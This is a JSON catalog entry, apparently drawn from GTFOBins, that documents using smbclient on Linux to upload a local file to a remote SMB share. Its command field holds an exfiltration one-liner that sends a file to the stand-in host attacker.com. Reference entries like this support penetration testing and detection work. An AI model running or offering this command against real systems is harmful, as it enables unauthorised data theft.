{
  "id": "gtfo-smbclient-upload",
  "name": "GTFOBins · smbclient (upload)",
  "command": "smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'",
  "description": "Use smbclient to upload via GTFOBins.",
  "platform": "linux",
  "tags": [
    "gtfobins",
    "smbclient",
    "upload"
  ],
  "source": "gtfobins",
  "source_url": "https://gtfobins.github.io/gtfobins/smbclient/#upload",
  "upstream_id": "smbclient/upload/0",
  "category": "gtfobins",
  "subcategory": "file-upload",
  "references": [
    {
      "title": "GTFOBins",
      "url": "https://gtfobins.github.io/gtfobins/smbclient/"
    }
  ]
}
